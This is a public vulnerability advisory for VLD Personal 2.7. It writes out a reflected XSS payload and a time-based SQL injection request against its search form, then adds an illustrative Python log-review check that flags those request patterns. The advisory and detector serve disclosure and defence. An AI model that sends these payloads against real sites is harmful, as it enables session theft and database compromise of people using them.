# Exploit Title: VLD Personal – Multiple Vulnerabilities
# Date: 09/11/2014
# Exploit Author: Mr T
# Exploit Authors Website: http://www.securitypentester.ninja
# Vendor Homepage: http://www.vldpersonals.com/
# Software Link: http://www.vldpersonals.com/clients/downloads.php
# Vulnerable Version: 2.7
# Fixed Version: 2.7.1
# Tested on: Windows / Linux
XSS Attack
Issue detail:
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9811c"><script>alert(1)</script>b7ec317c816 was submitted in the id parameter.
Response:
GET /index.php?m=member_profile&p=profile&id=9811c"><script>alert(1)<%2fscript>b7ec317c816 HTTP/1.1
SQL Injection:
Issue detail:
The country/gender1/gender2 parameters appear to be vulnerable to SQL injection attacks. The payload and benchmark(20000000,sha1(1))-- was submitted in the country parameter.
Response:
POST /index.php?m=search HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Cookie: visitors=x466x3878x3725x3797; PHPSESSID=nu75qtji88q4bilghhtg2s2; sessdata=0

age_from=19&age_to=19&issearch=1&submit=Search&gender1=2&gender2=2&type_id=members&country=1%20and%20benchmark(20000000%2csha1(1))--%20--
Talib Osmani
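
Added example, not part of the original advisory and not vendor code: a log-review check for sites still running 2.7 that flags the two request shapes described above, a quote or angle bracket in id and a MySQL delay function in the search fields. The function name, rule names and regular expressions are assumptions made for illustration; the parameter names and the two sample requests come from the advisory.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names come from the advisory; the rules themselves are assumptions.
REFLECTED_PARAMS = {"id"}
SEARCH_PARAMS = {"country", "gender1", "gender2"}

# Characters that close a double-quoted attribute or open a new tag.
ATTR_BREAKOUT = re.compile(r'["<>]')
# MySQL delay primitives used by time-based probes such as the one above.
SQL_TIMING = re.compile(r"\b(?:benchmark|sleep)\s*\(", re.IGNORECASE)


def inspect_request(request_line, body=""):
    """Return findings for one request line plus optional urlencoded body."""
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else ""
    # parse_qsl percent-decodes, so %2c and %20 cannot hide the payload.
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    findings = []
    for name, value in params:
        if name in REFLECTED_PARAMS and ATTR_BREAKOUT.search(value):
            findings.append("attr-breakout:" + name)
        if name in SEARCH_PARAMS:
            if SQL_TIMING.search(value):
                findings.append("sql-timing:" + name)
            elif value and not value.isdigit():
                # Assumption: these search fields carry numeric ids only.
                findings.append("non-numeric:" + name)
    return findings


# The two requests quoted in the advisory, plus one constructed benign request.
XSS_LINE = ('GET /index.php?m=member_profile&p=profile'
            '&id=9811c"><script>alert(1)<%2fscript>b7ec317c816 HTTP/1.1')
SQLI_LINE = "POST /index.php?m=search HTTP/1.1"
SQLI_BODY = ("age_from=19&age_to=19&issearch=1&submit=Search&gender1=2"
             "&gender2=2&type_id=members"
             "&country=1%20and%20benchmark(20000000%2csha1(1))--%20--")
BENIGN_LINE = "GET /index.php?m=member_profile&p=profile&id=42 HTTP/1.1"

if __name__ == "__main__":
    for line, body in ((XSS_LINE, ""), (SQLI_LINE, SQLI_BODY), (BENIGN_LINE, "")):
        print(line.split()[1][:40], inspect_request(line, body))
```

A hit only shows that a probe was sent; the fix remains upgrading to 2.7.1.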